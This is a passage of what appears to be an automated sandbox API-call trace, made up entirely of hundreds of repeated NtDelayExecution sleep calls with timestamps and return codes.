(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0142.934] NtDelayExecution 